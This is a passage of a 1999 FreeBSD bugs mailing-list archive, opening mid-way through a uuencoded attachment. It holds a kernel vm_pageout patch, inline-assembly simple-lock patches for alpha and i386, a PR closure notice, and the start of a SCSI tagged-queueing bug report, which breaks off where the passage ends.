MIM79ZV[6?NR6*XU2IML^SCYY\P0-0D(O5%$_>;:'>:-C+3P_@S,DL0GS)M:& M"=K5QC4E-P!O3%S.B+)HS2?AN."R+V+I"Y2D.\^0)2OS7&F9#BSW9UC1,.>* M=GYPJF&(\\F,G!$5$Y.U#Y7=Y-KDTP9^$S, MW:H"X&QQVOW!<*XVKH/91A*V<5N7DJ0-HY^I5;R7@+X`L-%H%3LUM;5167:" M&OCIG3+-P&I?8VHVZ)%:HBI2'#O,%70^7D"-*8;&^>3/QB`[8?\V&KV.M!;B M3T7TRI3K490A&2R",2DH0T&@'?EN@62'YB+%N3^[&HX)=YU@ZFGK28`X,:IW MHI`*3[L$;A,?99'.QCF.BM:)CG[A2KUXI9[7_Y1<206)? MQ)/B(%E\>Y)U:A04&Y_;[9Q+:J#C-A"ICWYD]S8@N1`2`:@57`1,Z]]4CW9? MO[^Z!+A/[+VQ5.^F>K3W[>5Z1[DFH?=RI>"N:VKONGJD]W(U6MWEYQXA+T!M!K[_>SV0F4Q3G0#J'[U+$F._+[6.X M6*P4,#4:):U`1QF@_:YUV'UU?-`B M6+OVE@/?GK2.#EHGW8/6L[,72>]/WQX_.SL]/3[B4&&1$OEPK,),PFLK@J2] ME5OSU-=R;9'VFLAJVDM]9Y'VGDZ$M)+E5+"*J4BL[NBWKS8HRAL MG=8_]O;W6YT.%0$4Q=?XTED6?IJRWS6"+-SQU84[/M3$8B2KL?]$^2\D^\]' M,DN$#MM'IXQ:IY?7C%H5I%ZE^\YVK!A%J'JSTG`=ITH5]IR"OQ6^\Q1\5)G( M%7[DN;UQ!+Z'+9NXA%S*H-P(WX3^!20%>18;X"VT+"5O3DR_7COH&`PT%,HB1FZTDT2P#18_SVF M*9N.O#M70X!&9=`G2BT)57E'[)8K4/ER>V/^WY";;VA=AM0]WNK`H`N1?-`\T$>M_[@(JD)W'.[QL$,QR]+ MX-Q<#L=6D>'-?"]].6\P-?S(GX=U#;YIE,2OP*2KJ7J6 M>`+&^ANP:?!_S5A^U*QX).2P5&]6R\UJE(2F5(\3TGK=2>1"9!1^B['8^OY` MK6HD)H)Y\LI<%J[N_OQXM6M,![KP+5[#O67\IDJ+>LM'*UK2FO)2"%K:6Z%9 M1VGOD2PQ(*S62H?"TJ#4QI#$+-F8NU&6G@AGIRQ?QVR6I1;*.,WJ=ZC]3'Q/ MK9$1SMB[^ M,0[1SXG:H6(5;V<'1GN'FE+_ED[RS_[H;H7(TG3H!ZY?CJASU2?_KC?Q9H,= MMFLFHACM)U@IHH8@SGUOCC0G.SQ7VLJWL))'BB,)4ONS(7,V<3X&R/CD!B9T M_?5T!>D;!S3"-*U!?(8#TD;?J2OTLNJALGL`H`](@[T"U&R&*>#A=!E#P\.Q M6&9Q1)-ZJ5!GGA^F&KI[-W/X$%5>(:[I:C+S'=9IO1/8A.,!K5&'32\/@6JN MY%^'KRP\A/G\>F0F!$;!4XQMN],,\*[D_=MA,&=^*#)*[!JF(_\6->]FRN%A MZRIZ%MSV'-Z'LO#^EA,6 MU>MX41M,ATA^H&GM&G%PW%'[9QNG^Z\!QT9CSN9W,?,`"N:7<`0K^3"'G("Y MT!?P$_,A`*`;"I!9P>/=1=G(59[0A$($,6%EA`MG(8&F7B[BA)=DXJ@3,6O6 MD\L"T&3U@NRO63FAID.\P!Q<]WD:T%R->LSZZQ?KFB("*.,!NLDT2K>5NMP) MYVE!08[#\K*K/P,UH)ZTNR+,A[M=<^LA2B!;0[M%3)&:24G8IA.#\N13ZW&` M"CTE.@.&0^]PEU`^Z3%O2W@$9!:33C-G2[-^RN,)3RWZ6.*FQC0;SI4DWXX6 ME`^\'WQ?R3,*(!T>7]#*3Q+.-D%"VPQ-MWOR49)>LY(@>'(]GV)Z#!036*:,C;L0$74,B9C`X1Y,)[#E83PL`%G$,@N!FYMV M/.WM"'5QB!'PW_XM@(XA073`/;4GK#Z2*5IUP!8KUP11T$+CAUE#,0@-RWWD M0O`\1Y=;PU4Q:=($>XCPXE0!,LQ]Q&C:R(BK>@$PP58R/P*PS8,0(#!(-$>R M"+HWCR^',T](&OK^C!S)#(JY,P52ZO65/7>T[*LI0T@6IOYQRQ`*]>Y",:'P M4!K.=3OH+SOG9!"]NY4\5)B-L(0WG8Z0E`\IG3M2C?B1HY!:S/@Y]M!'X](! M/$=FIG.I#D[:;UHG>)/UO/WB[&3OM'U\A&\"]2/?H.^+L,8ZA6,^65APV*@5ZJR*ZO@^]GFK6N_V7KT^;*UH?BN_WIZK.#O1 M%D,!EYUPJ+E@.`,5:\3XD+78J#BZ&7!FXSJ<).[GV9W&S(*)WJ5#=M%)(G24 M:"CSB@#,P3_=!2K"/ADC0:=>+!=KE`38P(VGSU%$`4.UXT/3XME*OA/A=4@Q M9EW9$\SUUYE`ZPI<=!BXFZ]M@!\VIM%(&U^MG_HN*#MS)L?,SDU2E$)++S70J\DN=# MWZ4I#EN5BP&E&G$X2!EWWR*08DZL31B/]&$H`&DH23+S$@B@NU2I$PVUXS.M MHA,M9D6,V1,EMCQTS$NM@N'77MPV@DD+SX_(3U:DJ0?+NYHT.XO;+5G M"65/"5M#6LZH%!)2;89F&PXDP]5)*8\D/XK)1?B[_MH+&T.)KFQCVM^08W;] MDB8$$%G4HROY>[6C46JGV:\D1:G*RDB:J@?"_".+X]Q/H8M\,C0J(D1=A-^#P-7A.J_6CJY7O\`=YLW4+Y7=_Q$^Y5-JLU=1W9'M; MBOQ5U7JEO*745JE2VRIOUC9K"@ZB:K7^G2I]]R_XN49Y0*GO9B`?+RIW<^G[ MH^_^XW["3I]`:M:#WG"\83&"?39?>9]\M&E)*V4*&/W]O4V17B@]'YBV]1FZ96EIQ.IYW4D;I]W3NI3F&Z M7OX?(%)`D93)+=>)SEHJE'!JJU4*AY/?6"N2R>[^ M9'K'@E6VGZ/2ZGB$%T;`2&!4=_44Z-3PO\_IRWI_]E&N9GD(FZ'\?3Z>(_"EO!Z!CDYX`8LH]97$X-)A24B> M)KMG&B^U`C]P%`Z1&2)>?`0-$G]H>C8J>0L6!E8!&?T*N>U`-V-#$;'.R.@Y M<<]>C_4YQ3;?E3CP`*0SD1IXF!W47_UA\//4Z*8&D_XUJA0]O=H;:'=/S`3( M%/YLB$R$63!::6*TG(%8W#E]V>ZHSO'ST[=[)RT%GX$*O&D?M`[4LY_@94OM MG9V^/#[IJ(\?]SKP_LD3M7=T`/]_`BGU-3#^'75\PA;R(+*VH1XT=+)W=-IN M=0JJ?;1_>(915`OJV=FI.CH^58?M5^U3*'9Z7*#VX]6HM>/GZE7K9/\E/-I[ MUCYLG_Y$_3YOGQYAG\^/3]2>>KUW/SO<.U&OSTY>'W<`7!C%0;NS?[C7 M?M4Z$-O](^A9M=X`ZZLZ+_<.#T,#>]8"F%`4YD9A8`?MD];^*4(OGZ25?9@7 M`.>PH#JO6_MM_-!ZUP+X]S!ZQS&I#SJM?YQ!(7BI#O8PW65'9<.S0(U%9P)F M'9CSUBL$$8;>.7O6.6V?GIVVU(OCXP.<8X4B5GN_U=E1A\X1`-`,S!`4@<_/SCIMFJOVT6GKY.3L->HTKQ$0Y; MT*%U?/(3-HYS0O->4&]?ME`2P'F$$9Z>[.'D8,S=_5.W&/1Y>GS"X[-C5D>M M%X?M%ZVC_1:6()GB;;O3RL%2M3M8H$W=`P)`OV=.LZ?A['T0(MI&H_ M5WL';]HX!*D`R]]I"ZK0%.Z_E"6PV/Y?(JTU_\LXQY@8OD^#^0"]+'Z(/!L- M>[&'*(-%'HZ&0"J#:,F[P+^-/];2B81#B[SU9[/Q)/Z,GCC/5NU1=+GJ/G?. M/'P12H#&GL37@74].$_Z\Z_C.9-$!R^AQ\`L+Y_Q9GT1.&]2' M2%RAAB)]43GLC-P%J!L00\XOQ/GS>M:3CT#7SNU'>$K^:>2&"6/7K_!S[R+: M/EXR=\\ONKT+.&PIT]HG_ZZ@^".)X%Q[33>S%F^#8$1WH)06DLJ3H/Z`\B+B M/:`&4_L'5""/CH<,X=('7N0!%41I\X`:1AFTH$[8SUAEUQ"E?IGT@;%S9M+)A>;.:3U9?KM3KAH M(U;9Z:?"?VH%5:[#GZ\%CE$J^G8I*TZ$OZX&UV,8'U:ETE`)_F]2W;*IRX64 M(#IJ0!ZK.Q^9KYQIQ_>P$<7M5*&!<@$]B/#;MFD'+WJYD1[JEA^K_ITWUFWP MK)8B_\P,4\:&O":ZK($2S/9F%Y1(TD'=@B"YGO@AM<&1IN:S_M4T"Y4*:G4R M7J4<:25.T1XBZ5F`OTC_37(O%6_@_'Q!"Z74%L:V"2P*DU?C9BC`D]M#<#FY M<;N('QE9VSIE!H2IWK_T^Y]((__Q(TS'+DT&,*13;S@S62AH.AYE6=&_2[U> MSKC7)[M/XGPS,+@I\-=HE='DXFGZZG2`UL!R8K8FE'99%6[#*U M&'Y8A[\Y##%%*6S4,)^7M(:9V`31C2\ MJ6$EMKZ78)'%WMX;VV(`G`25H$FU,9SF6'TA%V&,]S6Y@3^T=7:?(CWY07W1 MY9#&[CXUER0_8$$@FKM/K54M/@/"!E6)NN%7(&B[3S55Q=?= MIZ1$Q@I$6^./D5A%GJXR-@(OEVV]ZYYU@*N,YI<=HDKYV_@G7H,$U^5`;W4, M.JS]KRW9)1]Z0PTFL'+Z"]ZZO*]^L`2"HP#`UB5CR1+-Q M%F%XPB!8VDAM/ MI+/,2(*E1T*Y%`1<(";NP#!6G5EY)!D2(*!1*MUNEG2WZ.&>,1%8R:CJ8C8) M`G7I]3^QE4I;#28(U:#$?NZKRO5+&;Y"@[& M`*!<8;.LG*WW)M>,21PT%(&7>FBM>>7/Z;H_F,AM M/U:<^<5(MBBG%F4BB!@VTO5RCY+*D1$$7D6,)23!NID/B\P?/X+L1=H0M#\D M6QJTO'?TGUS'3(.'L`%9PSA6 MG&"HO)."XIR@#MR,5C@G9Y?%R26>B(QA'%$?T>G2FTYA!8I%]=;G+%ZZ"FPB M*48J0F6(!3RB?`-?@C)AH530!#*&H6C/?"R:T%0A;)(2_ MKC`=`GM`!F(`&%ZM\L6]7'QC(&+E#Y'D%W2-&P(26D7;PL$$^AGHAGE[]%C2 MPG@+7*-//`A?$],:T<&\+J\W^+!'2HR$!@7Y'7EDL0-OJ;L$IN#&CL&*?I;J M6@I,UGQX%,R\`$UKA$]*Q9.O-NE+>2?I_$^5S1>?07$/?R_ZF*,SL+__LB?# MU%M03&)=0:GY@E(42/G MN%%_5ZOR<54UU2I,.'\)-<&'39.$B[\-=!/\-%10GS[-4$%7\[)@X'@=C^/V MOF'<-M1C&')-/L\OS.!'_H4GP2*#]["D-IK&A\2JO?NK]B)5>1MBGRJMJHZL MD52Q=W_%:(^D,>$.TRI*G(V$>KW[Z^G^%JS>4?L5KM[\6U9/L\[AQ3./`;R? MD<=?98R:KR^QC9!N/0P>RZV'P;#/FRE@Q`G7O8JX.`$+4Z2EB(A.<""@B-R5 MD--`"J1F2DCG%!.6-9U-#*]C\JPL5#?^N\Q*`G)%9R6"32DH\E!]LDK1)<FM!`A>,J#9'GT:L89(*V%VPMHTU.WD`1)51`7D:N]BU6JSX-U[ M>H-,-R!X[XEPR6NT%I2O`+[PXF(F(J&>[U_&<@1L!GD!UN>72YA"W;Y$,NSR]]J>789->JK-FNUJ.4969W1K6GJ M]=+.LI/A?"^GPN<6NG\ZW-(TG&-@GJHEB2&D8PTLFH]P"TZ<`XQR%8HC5"UQ M&CZ)'+9^/%7/1VJD]F;BL]B]\J;F^:'Y=*7VK\R5Q4I>GDZQ'@<*OAJ8LC-\ MZD17A&_6B]N4"O`Y[VCS;([/CJ`3[.S\7%+F5CEC;JVPR3D+XFY!QF3L"C!I MBA$*K>`8K<]SR.WR-&*O*&%S/=+]]2<78V#A!TUHXQEP='/O0A4Y M\G-]S-/7N2/OI`X[UX6\HM9M"<21A"*D?98R>.FUDC^0$#GNU8HX/,3,ZFF5 M/3)4)_-ZHK'HEAG85NFV#'V^$:')-LEZO<0=C1+Z$/]+@P?0LM-4R!%'_'"N M)'@N$.6+.3E$E.MN*0,;7=M%8'/'G](GZH)#`73B[D/Q88BWR(/@PRM$`0]7 M6*`)$B(1`0H#<+X;D(@<@697I#VFC4%^/``[U=3E)<>==6NBI)9Z-R$:,U*O MY!&KV2B![R-*TE]'7X9&* MVU`6.A'Z3";1AD`7OD' M`^SX%R&RW0A[SP$C MR-6'S1$"3,Q"[N>^]AH#;`6D%-%'>Q?V$P4$=L6"[I!&P2&M/=8*8D-$7I?\ M"HV!$-[6"`YB/G=#1WXG>J$^IUC>:MV4@>H/9\KZRS!)_0_!(-6IU'XF\2-G]=SBQ6 MK;!,D@DIY\N;'_`_6:&IS"JYUZVBZ@?D!_Q+#GWX`6V\5@L<"VN+DN?4MW4* M;5;`K\/\!=ER`*6]P,UIF(_[XM#Y0V\*5XX?J'+6:QUB+^0'_X"+`U^/N<# M!%TGL*5B8DN!X#56F*LC7?<6?DG#YQ>HWGO?PS\?X#OR2!](1'YH@\4I43@0 M;8(/VO8G6O^^3A7+Y9+<6C+05AN`I?DJ1B)E3WVMLL%$MZPVV"WMJ.'3\J:H M"(IBAR::1%J/R$70\`,+LJ8<<,4+RRI[X8O:(KS)/YV1I<8517\9$NOAH1<6 M\'PC'4%#VZV)L@BE;.DB+&7O&BF; M[@*5R+DWTD-69.JDB:39-/-9KV.*Y7Q]LZ:3XU`*V;`^'1_1>B1:+[6/GA\7 MU&,JQ/I?9:V7M&%:*$:(V-KC&A'#9'S<.KYJP9-.?-V]4Q*[1^9FX_,SQS`U\P.#0UCU%(&P^^2?]PN9!J0%JFPR?Q[)'T/;'+#E;;Z$WXW5\_?_W\]?.O^_D_`3[7 %:0`8`0`% ` end >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 9:20: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 572CF14F2B for ; Sun, 12 Dec 1999 09:20:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA25689; Sun, 12 Dec 1999 09:20:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 12 Dec 1999 09:20:04 -0800 (PST) Message-Id: <199912121720.JAA25689@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Mitja Horvat Subject: Re: kern/15420: 3.3-RELEASE Kernel freeze Reply-To: Mitja Horvat Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15420; it has been noted by GNATS. From: Mitja Horvat To: freebsd-gnats-submit@freebsd.org, mitja@ksop-cscp.si Cc: Subject: Re: kern/15420: 3.3-RELEASE Kernel freeze Date: Sun, 12 Dec 1999 19:19:10 +0100 In the last bug report I sent the wrong patch. Sorry for the inconvenience. The right patch is this: --------------------------------->8-------------------------------- --- vm_pageout.c.orig Mon Aug 30 00:42:11 1999 +++ vm_pageout.c Sun Dec 12 18:16:38 1999 @@ -1136,8 +1136,9 @@ * make sure that we have swap space -- if we are low on memory and * swap -- then kill the biggest process. */ - if ((vm_swap_size == 0 || swap_pager_full) && - ((cnt.v_free_count + cnt.v_cache_count) < cnt.v_free_min)) { + if (vm_swap_size == 0 && + (cnt.v_free_count + cnt.v_cache_count) < cnt.v_free_min || + swap_pager_full) { bigproc = NULL; bigsize = 0; for (p = allproc.lh_first; p != 0; p = p->p_list.le_next) { --------------------------------->8-------------------------------- Regards, Mitja To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 11:20:12 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3ED1814D11 for ; Sun, 12 Dec 1999 11:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA34089; Sun, 12 Dec 1999 11:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from io.yi.org (24.66.174.118.bc.wave.home.com [24.66.174.118]) by hub.freebsd.org (Postfix) with ESMTP id 1E7FB14E52 for ; Sun, 12 Dec 1999 11:10:41 -0800 (PST) (envelope-from root@io.yi.org) Received: by io.yi.org (Postfix, from userid 0) id F2AB01FCD; Sun, 12 Dec 1999 11:10:39 -0800 (PST) Message-Id: <19991212191039.F2AB01FCD@io.yi.org> Date: Sun, 12 Dec 1999 11:10:39 -0800 (PST) From: jburkhol@home.com Reply-To: jburkhol@home.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15440: support atomic locks in the UP kernel Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15440 >Category: kern >Synopsis: support atomic locks in the UP kernel >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 11:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Jake Burkholder >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: 4.0-CURRENT >Description: This patch brings in alpha inline asm versions of s_lock_init, s_lock, s_lock_try and s_unlock from netbsd, and converts the existing i386 routines to inline asm as well. This way the locks are useable from userland, simply by including . It is hoped that these routines will aid in making the linuxthreads port pltaform independent, and serve as a basis for more advanvced synchronization primitives when native threads are developed. I've tested this on a UP i386 machine, but do not have access to SMP or alpha hardware. An SMP kernel compiles, and there should be no functional changes in that case, since the debug versions in simplelock.s are used rather than these inline ones. The alpha versions are taken directly from netbsd, so I assume they work fine. >How-To-Repeat: n/a >Fix: The patch is included below, and is also available at http://io.yi.org/lock.diff. Index: alpha/include/lock.h =================================================================== RCS file: /home/ncvs/src/sys/alpha/include/lock.h,v retrieving revision 1.5 diff -c -r1.5 lock.h *** lock.h 1999/08/28 00:38:47 1.5 --- lock.h 1999/12/12 10:24:43 *************** *** 29,34 **** --- 29,38 ---- #ifndef _MACHINE_LOCK_H_ #define _MACHINE_LOCK_H_ + #define COM_LOCK() + #define COM_UNLOCK() + + #define SIMPLELOCK_LOCKED 1 /* * Simple spin lock. *************** *** 38,44 **** volatile int lock_data; }; ! #define COM_LOCK() ! #define COM_UNLOCK() #endif /* !_MACHINE_LOCK_H_ */ --- 42,165 ---- volatile int lock_data; }; ! /* inline simplelock functions */ ! static __inline void s_lock_init __P((struct simplelock *)); ! static __inline void s_lock __P((struct simplelock *)); ! static __inline void s_lock_try __P((struct simplelock *)); ! static __inline void s_unlock __P((struct simplelock *)); ! ! /* ! * void ! * s_lock_init(struct simplelock *lkp) ! * { ! * lkp->lock_data = 0; ! * } ! */ ! static __inline void ! s_lock_init(lkp) ! struct simplelock *lkp; ! { ! ! __asm __volatile( ! "# BEGIN cpu_simple_lock_init\n" ! " stl $31, %0 \n" ! " mb \n" ! " # END cpu_simple_lock_init" ! : "=m" (lkp->lock_data)); ! } ! ! /* ! * void ! * s_lock(struct simplelock *lkp) ! * { ! * while (test_and_set(&lkp->lock_data)) ! * continue; ! * } ! */ ! static __inline void ! s_lock(lkp) ! struct simplelock *lkp; ! { ! unsigned long t0; ! ! /* ! * Note, if we detect that the lock is held when ! * we do the initial load-locked, we spin using ! * a non-locked load to save the coherency logic ! * some work. ! */ ! ! __asm __volatile( ! "# BEGIN cpu_simple_lock\n" ! "1: ldl_l %0, %3 \n" ! " bne %0, 2f \n" ! " bis $31, %2, %0 \n" ! " stl_c %0, %1 \n" ! " beq %0, 3f \n" ! " mb \n" ! " br 4f \n" ! "2: ldl %0, %3 \n" ! " beq %0, 1b \n" ! " br 2b \n" ! "3: br 1b \n" ! "4: \n" ! " # END cpu_simple_lock\n" ! : "=r" (t0), "=m" (lkp->lock_data) ! : "i" (SIMPLELOCK_LOCKED), "1" (lkp->lock_data)); ! } ! ! /* ! * int ! * s_lock_try(struct simplelock *lkp) ! * { ! * return (!test_and_set(&lkp->lock_data)); ! * } ! */ ! static __inline int ! s_lock_try(lkp) ! struct simplelock *lkp; ! { ! unsigned long t0, v0; ! ! __asm __volatile( ! "# BEGIN cpu_simple_lock_try\n" ! "1: ldl_l %0, %4 \n" ! " bne %0, 2f \n" ! " bis $31, %3, %0 \n" ! " stl_c %0, %2 \n" ! " beq %0, 3f \n" ! " mb \n" ! " bis $31, 1, %1 \n" ! " br 4f \n" ! "2: bis $31, $31, %1 \n" ! " br 4f \n" ! "3: br 1b \n" ! "4: \n" ! " # END cpu_simple_lock_try" ! : "=r" (t0), "=r" (v0), "=m" (lkp->lock_data) ! : "i" (SIMPLELOCK_LOCKED), "2" (lkp->lock_data)); ! ! return (v0); ! } ! ! /* ! * void ! * s_unlock(struct simplelock *lkp) ! * { ! * lkp->lock_data = 0; ! * } ! */ ! static __inline void ! s_unlock(lkp) ! struct simplelock *lkp; ! { ! ! __asm __volatile( ! "# BEGIN cpu_simple_unlock\n" ! " stl $31, %0 \n" ! " mb \n" ! " # END cpu_simple_unlock" ! : "=m" (lkp->lock_data)); ! } #endif /* !_MACHINE_LOCK_H_ */ Index: i386/i386/simplelock.s =================================================================== RCS file: /home/ncvs/src/sys/i386/i386/simplelock.s,v retrieving revision 1.11 diff -c -r1.11 simplelock.s *** simplelock.s 1999/08/28 00:43:50 1.11 --- simplelock.s 1999/12/12 10:28:58 *************** *** 57,75 **** /* * void - * s_lock_init(struct simplelock *lkp) - * { - * lkp->lock_data = 0; - * } - */ - ENTRY(s_lock_init) - movl 4(%esp), %eax /* get the address of the lock */ - movl $0, (%eax) - ret - - - /* - * void * s_lock(struct simplelock *lkp) * { * while (test_and_set(&lkp->lock_data)) --- 57,62 ---- *************** *** 84,106 **** * the local cache (and thus causing external bus writes) with repeated * writes to the lock. */ ! #ifndef SL_DEBUG ! ! ENTRY(s_lock) ! movl 4(%esp), %eax /* get the address of the lock */ ! movl $1, %ecx ! setlock: ! xchgl %ecx, (%eax) ! testl %ecx, %ecx ! jz gotit /* it was clear, return */ ! wait: ! cmpl $0, (%eax) /* wait to empty */ ! jne wait /* still set... */ ! jmp setlock /* empty again, try once more */ ! gotit: ! ret ! ! #else /* SL_DEBUG */ ENTRY(s_lock) movl 4(%esp), %edx /* get the address of the lock */ --- 71,77 ---- * the local cache (and thus causing external bus writes) with repeated * writes to the lock. */ ! #ifdef SL_DEBUG ENTRY(s_lock) movl 4(%esp), %edx /* get the address of the lock */ *************** *** 143,164 **** * return (!test_and_set(&lkp->lock_data)); * } */ ! #ifndef SL_DEBUG ENTRY(s_lock_try) - movl 4(%esp), %eax /* get the address of the lock */ - movl $1, %ecx - - xchgl %ecx, (%eax) - testl %ecx, %ecx - setz %al /* 1 if previous value was 0 */ - movzbl %al, %eax /* convert to an int */ - - ret - - #else /* SL_DEBUG */ - - ENTRY(s_lock_try) movl 4(%esp), %edx /* get the address of the lock */ movl _cpu_lockid, %ecx /* add cpu id portion */ incl %ecx /* add lock portion */ --- 114,122 ---- * return (!test_and_set(&lkp->lock_data)); * } */ ! #ifdef SL_DEBUG ENTRY(s_lock_try) movl 4(%esp), %edx /* get the address of the lock */ movl _cpu_lockid, %ecx /* add cpu id portion */ incl %ecx /* add lock portion */ *************** *** 172,191 **** ret #endif /* SL_DEBUG */ - - - /* - * void - * s_unlock(struct simplelock *lkp) - * { - * lkp->lock_data = 0; - * } - */ - ENTRY(s_unlock) - movl 4(%esp), %eax /* get the address of the lock */ - movl $0, (%eax) - ret - /* * These versions of simple_lock block interrupts, --- 130,135 ---- Index: i386/include/lock.h =================================================================== RCS file: /home/ncvs/src/sys/i386/include/lock.h,v retrieving revision 1.11 diff -c -r1.11 lock.h *** lock.h 1999/11/19 22:47:19 1.11 --- lock.h 1999/12/12 10:34:22 *************** *** 211,220 **** volatile int lock_data; }; ! /* functions in simplelock.s */ ! void s_lock_init __P((struct simplelock *)); void s_lock __P((struct simplelock *)); int s_lock_try __P((struct simplelock *)); void ss_lock __P((struct simplelock *)); void ss_unlock __P((struct simplelock *)); void s_lock_np __P((struct simplelock *)); --- 211,229 ---- volatile int lock_data; }; ! /* functions used by both UP and SMP */ ! static __inline void s_lock_init __P((struct simplelock *)); ! static __inline void s_unlock __P((struct simplelock *)); ! ! #ifndef SL_DEBUG ! static __inline void s_lock __P((struct simplelock *)); ! static __inline int s_lock_try __P((struct simplelock *)); ! #else void s_lock __P((struct simplelock *)); int s_lock_try __P((struct simplelock *)); + #endif /* SL_DEBUG */ + + /* functions in simplelock.s */ void ss_lock __P((struct simplelock *)); void ss_unlock __P((struct simplelock *)); void s_lock_np __P((struct simplelock *)); *************** *** 222,232 **** --- 231,305 ---- /* inline simplelock functions */ static __inline void + s_lock_init(struct simplelock *lkp) + { + lkp->lock_data = 0; + } + + static __inline void s_unlock(struct simplelock *lkp) { lkp->lock_data = 0; } + #ifndef SL_DEBUG + + /* + * void + * s_lock(struct simplelock *lkp) + * { + * while (test_and_set(&lkp->lock_data)) + * continue; + * } + */ + static __inline void + s_lock(struct simplelock *lkp) + { + + __asm __volatile( + " movl $1, %%eax \n" + "1: \n" + " xchgl %%eax, %0 \n" + " testl %%eax, %%eax \n" + " jz 3f \n" + "2: \n" + " cmpl $0, %0 \n" + " jne 2b \n" + " jmp 1b \n" + "3: \n" + : "=m" (lkp->lock_data) + : "0" (lkp->lock_data) + : "eax"); + } + + /* + * int + * s_lock_try(struct simplelock *lkp) + * { + * return (!test_and_set(&lkp->lock_data)); + * } + */ + static __inline int + s_lock_try(struct simplelock *lkp) + { + int r; + + __asm __volatile( + " movl $1, %1 \n" + " xorl %%ecx, %%ecx \n" + " xchgl %1, %0 \n" + " testl %1, %1 \n" + " setz %%cl \n" + " movzbl %%cl, %1 \n" + : "=m" (lkp->lock_data), "=r" (r) + : "0" (lkp->lock_data) + : "ecx"); + + return (r); + } + + #endif /* SL_DEBUG */ + /* global data in mp_machdep.c */ extern struct simplelock imen_lock; extern struct simplelock cpl_lock; *************** *** 239,245 **** #if !defined(SIMPLELOCK_DEBUG) && NCPUS > 1 /* ! * This set of defines turns on the real functions in i386/isa/apic_ipl.s. */ #define simple_lock_init(alp) s_lock_init(alp) #define simple_lock(alp) s_lock(alp) --- 312,318 ---- #if !defined(SIMPLELOCK_DEBUG) && NCPUS > 1 /* ! * This set of defines turns on the real functions in i386/i386/simplelock.s. */ #define simple_lock_init(alp) s_lock_init(alp) #define simple_lock(alp) s_lock(alp) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 18: 8:13 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2919714C47; Sun, 12 Dec 1999 18:08:12 -0800 (PST) (envelope-from jkh@FreeBSD.org) Received: (from jkh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA63318; Sun, 12 Dec 1999 18:08:12 -0800 (PST) (envelope-from jkh@FreeBSD.org) Date: Sun, 12 Dec 1999 18:08:12 -0800 (PST) From: Message-Id: <199912130208.SAA63318@freefall.freebsd.org> To: les@safety.net, jkh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/14731: The kernel has vlan support but ifconfig won't config it Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: The kernel has vlan support but ifconfig won't config it State-Changed-From-To: open->closed State-Changed-By: jkh State-Changed-When: Sun Dec 12 18:07:50 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 18:21:54 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CE57E14E79 for ; Sun, 12 Dec 1999 18:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA64629; Sun, 12 Dec 1999 18:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 0010914CB3; Sun, 12 Dec 1999 18:18:55 -0800 (PST) Message-Id: <19991213021855.0010914CB3@hub.freebsd.org> Date: Sun, 12 Dec 1999 18:18:55 -0800 (PST) From: klh@netcom.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/15446: Unpredictable enabling of SCSI Tagged Queueing Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15446 >Category: kern >Synopsis: Unpredictable enabling of SCSI Tagged Queueing >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 18:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ken Harrenstien >Release: 3.1-RELEASE >Organization: >Environment: FreeBSD 3.1-RELEASE FreeBSD 3.1-RELEASE #: i386 >Description: Whether or not a device capable of tagged queueing is actually flagged as such appears to be semi-random. It can be different for two identical drives, and can change from one boot to the next of the same kernel. For example, on one recent boot, two identical drives give this: da0: 10.0MB/s 